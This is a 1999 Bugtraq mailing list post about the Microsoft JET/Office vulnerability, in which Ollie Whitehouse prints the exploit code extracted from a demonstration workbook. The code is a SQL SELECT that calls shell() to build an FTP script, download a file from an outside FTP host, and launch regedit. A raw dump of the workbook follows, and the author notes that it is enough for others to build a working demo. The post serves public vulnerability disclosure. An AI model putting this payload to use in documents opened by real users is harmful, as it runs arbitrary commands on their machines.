Bugtraq mailing list archives
Microsoft JET/Office Vulnerability Exploit
From: ollie () DELPHISPLC COM (Ollie Whitehouse)
Date: Thu, 19 Aug 1999 12:27:01 +0100
All, Russ Cooper:
Well, with the module password protected it seems clear you're not out to get that critique very quickly. Maybe if you'd let someone know the details we'd be able to answer you. As it is, we're simply left with what appears to be the same exploit.
Below is the code from the workbook: [Code] SELECT shell('command.com /C echo user anonymous yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit > c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys [RAW Dump from the workbook from the SF web site] SELECT shell('command.com /C echo user anonymous yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit > c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt; *.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction s=0;Threads=3;UID=admin;UserCommitSync=Yes That will be enough information for people who want to create their own working demo. Ollie <% Ollie Whitehouse I.T Co-Ordinator - Delphis Consulting VOX: +44 (0)207 916 0200 (Switchboard) FAX: +44 (0)207 916 1620 (Main) FAX: +44 (0)870 0881837 (FAX - E-Mail) PGP: http://www.ombs.demon.co.uk/pgp.txt Tag: Who needs Windows2000 when you have OS/2? %>
Current thread:
- Microsoft JET/Office Vulnerability Exploit Elias Levy (Aug 18)
- Re: Microsoft JET/Office Vulnerability Exploit Ben Greenbaum (Aug 18)
- Jet 3.51 Vul / Office 97 hexedit () POREIA COM (Aug 18)
- <Possible follow-ups>
- Re: Microsoft JET/Office Vulnerability Exploit Russ (Aug 18)
- Re: Microsoft JET/Office Vulnerability Exploit Elias Levy (Aug 18)
- Administrivia Elias Levy (Aug 18)
- Microsoft JET/Office Vulnerability Exploit Ollie Whitehouse (Aug 19)
- Re: Microsoft JET/Office Vulnerability Exploit Russ (Aug 19)